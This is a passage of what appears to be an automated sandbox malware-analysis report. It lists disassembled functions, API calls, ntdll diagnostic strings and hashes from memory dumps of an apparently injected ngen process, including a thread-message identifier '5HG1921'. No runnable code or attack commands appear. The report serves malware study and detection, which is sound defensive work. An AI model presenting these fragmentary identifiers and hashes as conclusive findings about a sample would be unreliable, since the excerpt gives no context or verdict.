                                                                                                                      control_flow_graph 16 4139ac-4139c5 17 4139cd-413a1d call 42d7c3 call 417363 call 404963 call 424183 16->17 18 4139c8 call 42cdb3 16->18 27 413a3d-413a43 17->27 28 413a1f-413a2e PostThreadMessageW 17->28 18->17 28->27 29 413a30-413a3a 28->29 29->27
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 00413A2A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446
                                                                                                                      • Opcode ID: b34addbe20bd6fa453a76904b520b25f47715a780ee56d38b00acfcc3012c8a0
                                                                                                                      • Instruction ID: 029bd832c41146fd542e92088dec1127d713c77ea301eee208814c2462d23b19
                                                                                                                      • Opcode Fuzzy Hash: b34addbe20bd6fa453a76904b520b25f47715a780ee56d38b00acfcc3012c8a0
                                                                                                                      • Instruction Fuzzy Hash: FE01E5B1D0015CBAEB11AAE19C81DEF7F7CDF41398F04806AFA14A7141D5384F068BA1
                                                                                                                      Function 004139B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 30 4139b3-4139c5 31 4139cd-413a1d call 42d7c3 call 417363 call 404963 call 424183 30->31 32 4139c8 call 42cdb3 30->32 41 413a3d-413a43 31->41 42 413a1f-413a2e PostThreadMessageW 31->42 32->31 42->41 43 413a30-413a3a 42->43 43->41
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 00413A2A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446
                                                                                                                      • Opcode ID: f2e01d98ab6f9828d45de6ab09c9b958c78cc16b3eb2a09fd1a56409c2ddaae4
                                                                                                                      • Instruction ID: d01e503dcadc4ec1cb9195f561489c762393b110c3e9ea34d22d4b395d03e37b
                                                                                                                      • Opcode Fuzzy Hash: f2e01d98ab6f9828d45de6ab09c9b958c78cc16b3eb2a09fd1a56409c2ddaae4
                                                                                                                      • Instruction Fuzzy Hash: 4901C4B1D0025CBAEB11AAE19C81DEF7B7CDF41798F44806AFA14B7241D5784F068BA5
                                                                                                                      Function 00417414 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 161 417414-417417 162 417419-41741f 161->162 163 41739b-4173a0 161->163 164 4173b0-4173c1 call 42c3d3 163->164 165 4173a2-4173ad call 42e1d3 163->165 170 4173c3-4173d7 LdrLoadDll 164->170 171 4173da-4173dd 164->171 165->164 170->171
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004173D5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 3859159040f67455db16ba62f7af40b5874b346214392ea43279fb352a88c7b2
                                                                                                                      • Instruction ID: 8994ebbfab8840bdbb3e90bbba16e780a0f590c0bd6815c1392426ba12970d17
                                                                                                                      • Opcode Fuzzy Hash: 3859159040f67455db16ba62f7af40b5874b346214392ea43279fb352a88c7b2
                                                                                                                      • Instruction Fuzzy Hash: 29F05E75E0010DABEB14DA90DC82FAFB3789B04304F1081AAFD18E7240E675EF55CBA5
                                                                                                                      Function 0042B173 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 172 42b173-42b1b1 call 4049f3 call 42bf13 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,0041DB6B,?,?,00000000,?,0041DB6B,?,?,?), ref: 0042B1AC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: f319cfc0ffa5fba61140cb43c6bd046cce7cec7d9a4d00fd9a17caaaa4b23255
                                                                                                                      • Instruction ID: db4109bc0e461fa70a238ea784063dfbe3d00b280b999304d927b6b61a801d8e
                                                                                                                      • Opcode Fuzzy Hash: f319cfc0ffa5fba61140cb43c6bd046cce7cec7d9a4d00fd9a17caaaa4b23255
                                                                                                                      • Instruction Fuzzy Hash: EAE01AB22042157BDA24EE5AEC42F9B77ACEFC9714F404419FA08A7242D775BD118BB8
                                                                                                                      Function 0042B1B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 177 42b1b3-42b1f1 call 4049f3 call 42bf13 RtlFreeHeap
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5057E845,00000007,00000000,00000004,00000000,00416C46,000000F4,?,?,?,?,?), ref: 0042B1EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 2fb760c5b7c822af1ff21714c29907829619677d40777e10c525f560c0d2039e
                                                                                                                      • Instruction ID: bfa399e617bde7b85eab98627a6eb55ed8be34ed8df15d67547484727a294766
                                                                                                                      • Opcode Fuzzy Hash: 2fb760c5b7c822af1ff21714c29907829619677d40777e10c525f560c0d2039e
                                                                                                                      • Instruction Fuzzy Hash: A1E06DB22042147FC620EE59EC41F9B77ACEFC4710F00441AFA08A7281D775B9108AB4
                                                                                                                      Function 0042B1F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 187 42b1f3-42b22c call 4049f3 call 42bf13 ExitProcess
                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(?,00000000,?,?,8F52686D,?,?,8F52686D), ref: 0042B227
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: 8207c5f643e454cae59d6893ebde6913045abb7fd80e472089093777ba661ac2
                                                                                                                      • Instruction ID: ac45764ded2e3411e2aa5c8c4bfcddf1d2723c54ba8556d66cb7b9fd1258bb52
                                                                                                                      • Opcode Fuzzy Hash: 8207c5f643e454cae59d6893ebde6913045abb7fd80e472089093777ba661ac2
                                                                                                                      • Instruction Fuzzy Hash: 74E04F762002147BC620AA5ADC01F9BB79CDFC5714F50442AFA08A7242C675790187F4
                                                                                                                      Function 05772C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 192 5772c0a-5772c0f 193 5772c11-5772c18 192->193 194 5772c1f-5772c26 LdrInitializeThunk 192->194
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 9e5e871fc570264d422ea0c58da9919ce24b91bd1ec58164e7a0e56c90416bb7
                                                                                                                      • Instruction ID: 23aa8c1876b8e82fd6b601d16e54f49f14a9dad4dbf857fe8b6a37bb3d21f881
                                                                                                                      • Opcode Fuzzy Hash: 9e5e871fc570264d422ea0c58da9919ce24b91bd1ec58164e7a0e56c90416bb7
                                                                                                                      • Instruction Fuzzy Hash: 9CB04C729415C585DA11A7605648A26791567A0711F55C461D2120655A47288191F176

                                                                                                                      Non-executed Functions

                                                                                                                      Function 057B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2160512332
                                                                                                                      • Opcode ID: 085ed4e30c0141392a49aa67820fee0b8330820ac8f1ff00f5bf1f104d69e536
                                                                                                                      • Instruction ID: 0f6da962bccaa45f9ebfb2bf5e7ebb29233352458ab60043e98bee1071d4aa66
                                                                                                                      • Opcode Fuzzy Hash: 085ed4e30c0141392a49aa67820fee0b8330820ac8f1ff00f5bf1f104d69e536
                                                                                                                      • Instruction Fuzzy Hash: ED92CD75609341AFE720DF24C888FABB7E9BB84710F00492DFA95D7251D7B0E844EB92
                                                                                                                      Function 05768620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057A54CE
                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057A540A, 057A5496, 057A5519
                                                                                                                      • undeleted critical section in freed memory, xrefs: 057A542B
                                                                                                                      • double initialized or corrupted critical section, xrefs: 057A5508
                                                                                                                      • Thread identifier, xrefs: 057A553A
                                                                                                                      • Address of the debug info found in the active list., xrefs: 057A54AE, 057A54FA
                                                                                                                      • 8, xrefs: 057A52E3
                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057A54E2
                                                                                                                      • corrupted critical section, xrefs: 057A54C2
                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 057A5543
                                                                                                                      • Invalid debug info address of this critical section, xrefs: 057A54B6
                                                                                                                      • Critical section debug info address, xrefs: 057A541F, 057A552E
                                                                                                                      • Critical section address, xrefs: 057A5425, 057A54BC, 057A5534
                                                                                                                      • Critical section address., xrefs: 057A5502
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                      • API String ID: 0-2368682639
                                                                                                                      • Opcode ID: 0c9d9f1319845a2cc83af49f94d12185ad8f4ab33b0a290b6977f29248ba8450
                                                                                                                      • Instruction ID: 75db10676a6e38122cc1962908dc9d2afb7e0ad3a3a8b62fc2602d7cd5283cdb
                                                                                                                      • Opcode Fuzzy Hash: 0c9d9f1319845a2cc83af49f94d12185ad8f4ab33b0a290b6977f29248ba8450
                                                                                                                      • Instruction Fuzzy Hash: C2817BB1A00358EFDF20CF99C845FAEBBB6BB48B14F244219F905B7240D775A940EB65
                                                                                                                      Function 057C9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                      • API String ID: 0-3063724069
                                                                                                                      • Opcode ID: 762cf642f514fb94f09ae47548744e9f41dba421224c99f244c219bb2b0b9cd1
                                                                                                                      • Instruction ID: de2065fbd0623f8266d7eb298b91c093abaeeb8e0db077273d0f27840efa5852
                                                                                                                      • Opcode Fuzzy Hash: 762cf642f514fb94f09ae47548744e9f41dba421224c99f244c219bb2b0b9cd1
                                                                                                                      • Instruction Fuzzy Hash: 22D1F7B2908315ABD761DF54C848B6BBBE8BF84714F4009ADFA84A7190D770ED44EB92
                                                                                                                      Function 0572D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 0572D0FD
                                                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0572D0CF
                                                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0572D196
                                                                                                                      • @, xrefs: 0572D313
                                                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0572D146
                                                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0572D262
                                                                                                                      • @, xrefs: 0572D2AF
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0572D2C3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                      • API String ID: 0-1356375266
                                                                                                                      • Opcode ID: 7baebc97427866187ff6c80c4f336ff692f626071e64d22402574ecc6fbae8c6
                                                                                                                      • Instruction ID: f0e110d8a3ae911d95eaa8bfe9df5dc23c87772a88ac8f2893bde038142218c7
                                                                                                                      • Opcode Fuzzy Hash: 7baebc97427866187ff6c80c4f336ff692f626071e64d22402574ecc6fbae8c6
                                                                                                                      • Instruction Fuzzy Hash: 2EA1AB71A08355DFD721DF20C488BABB7E9BB84725F00492EF69896240E774D909EF93
                                                                                                                      Function 0572F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-523794902
                                                                                                                      • Opcode ID: 6bd3e33fff894d5679f23ea4c3bdd8a5c8e0503743a73e2ea2f593f08bb8f48a
                                                                                                                      • Instruction ID: 5bf2422a9ce76ae5bbc83fce3570c7665ca9a3246c1fa2f1eee686f9363ea5c3
                                                                                                                      • Opcode Fuzzy Hash: 6bd3e33fff894d5679f23ea4c3bdd8a5c8e0503743a73e2ea2f593f08bb8f48a
                                                                                                                      • Instruction Fuzzy Hash: 3B42EF71608791DFC715EF29C888A3ABBE6FF88304F14496DE8968B351DB30E941EB51
                                                                                                                      Function 0574B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                      • API String ID: 0-122214566
                                                                                                                      • Opcode ID: 61dc1aed918ba9e6871c8e62e3e31cf58e91739b8993003c0c29c774491d5744
                                                                                                                      • Instruction ID: dbacb6478b89e77cf55ca246ee132acfa079d7f5ee7c68c1e0cb56379058005d
                                                                                                                      • Opcode Fuzzy Hash: 61dc1aed918ba9e6871c8e62e3e31cf58e91739b8993003c0c29c774491d5744
                                                                                                                      • Instruction Fuzzy Hash: A1C14A71B04215ABCF29CF69C889B7EB7A6FF45310F144069E80A9B291DB74DC44FBA1
                                                                                                                      Function 057DF525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                      • API String ID: 0-1745908468
                                                                                                                      • Opcode ID: 450e70eac72f50e258620199efefedd725dc7bada10938126c953751d8daedb6
                                                                                                                      • Instruction ID: f466404f6d6c79f9d67d74c077551c1f30616753bd496ed7d40070df955b83d9
                                                                                                                      • Opcode Fuzzy Hash: 450e70eac72f50e258620199efefedd725dc7bada10938126c953751d8daedb6
                                                                                                                      • Instruction Fuzzy Hash: A891F171A04644DFCB11DF68C449AADFBF2FF49714F188059E886AB761CB759980EF20
                                                                                                                      Function 0572645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • apphelp.dll, xrefs: 05726496
                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 057899ED
                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05789A2A
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05789A11, 05789A3A
                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05789A01
                                                                                                                      • LdrpInitShimEngine, xrefs: 057899F4, 05789A07, 05789A30
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-204845295
                                                                                                                      • Opcode ID: 13d931badd1df32c4cb4de8dbcde6ef12ebc6f3bc8c1e7e2279b3d81b01090a1
                                                                                                                      • Instruction ID: 1e915dd9c918d4b7f8a99fe8b5c918304168bcbafa77f90340e0eb2f417774b4
                                                                                                                      • Opcode Fuzzy Hash: 13d931badd1df32c4cb4de8dbcde6ef12ebc6f3bc8c1e7e2279b3d81b01090a1
                                                                                                                      • Instruction Fuzzy Hash: 8C51B1712583049FD720EF25C899A7B7BE9FB84744F00492EF9869B150EB30E944EB93
                                                                                                                      Function 05762674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 057A219F
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 057A21BF
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 057A2178
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 057A2165
                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 057A2160, 057A219A, 057A21BA
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 057A2180
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                      • API String ID: 0-861424205
                                                                                                                      • Opcode ID: 1bb45ab5e764f6de781546140cd22a314565fb7a9619b347d802a31d80d69b0b
                                                                                                                      • Instruction ID: 9b3054b61faabbd2bb49e039edf1bd693bab31f80df0422016a654f6322032d4
                                                                                                                      • Opcode Fuzzy Hash: 1bb45ab5e764f6de781546140cd22a314565fb7a9619b347d802a31d80d69b0b
                                                                                                                      • Instruction Fuzzy Hash: EC31377AB40214BBEB25CA98CC45F9E7779EB94B40F054169FE0577142D670AE00F7A1
                                                                                                                      Function 0576C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpInitializeProcess, xrefs: 0576C6C4
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 057A8181, 057A81F5
                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 057A8177, 057A81EB
                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 057A81E5
                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 057A8170
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0576C6C3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-475462383
                                                                                                                      • Opcode ID: 1db52638ba87b60a3decd68b6aa8af7919d9a83b27da61e89d976d87d00efa29
                                                                                                                      • Instruction ID: 22c7c8d1ea18c094adbbb4907674b5b7e540613758ecfc99d4518d4e4415d5fd
                                                                                                                      • Opcode Fuzzy Hash: 1db52638ba87b60a3decd68b6aa8af7919d9a83b27da61e89d976d87d00efa29
                                                                                                                      • Instruction Fuzzy Hash: 7331D7B27443459FD224EF28DD4EE2A7BD5EFC4B10F040958FC855B291EA60ED04E7A2
                                                                                                                      Function 0575F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 057A02BD
                                                                                                                      • RTL: Re-Waiting, xrefs: 057A031E
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 057A02E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: a767f1660a553d0c0178411722f9f67b7e4013747e64617e23b2955c1c6e1786
                                                                                                                      • Instruction ID: 603da34aa79924ded098839a4598b2b43f3b2526423415c3cdfc2d5f9c4530d5
                                                                                                                      • Opcode Fuzzy Hash: a767f1660a553d0c0178411722f9f67b7e4013747e64617e23b2955c1c6e1786
                                                                                                                      • Instruction Fuzzy Hash: E6E1C1716087419FD724CF28C888B6AB7E1FF84324F144A1DF9A68B2D1D7B5E944EB42
                                                                                                                      Function 057551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 05755352
                                                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 05755247
                                                                                                                      • Kernel-MUI-Language-SKU, xrefs: 0575542B
                                                                                                                      • WindowsExcludedProcs, xrefs: 0575522A
                                                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 0575527B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
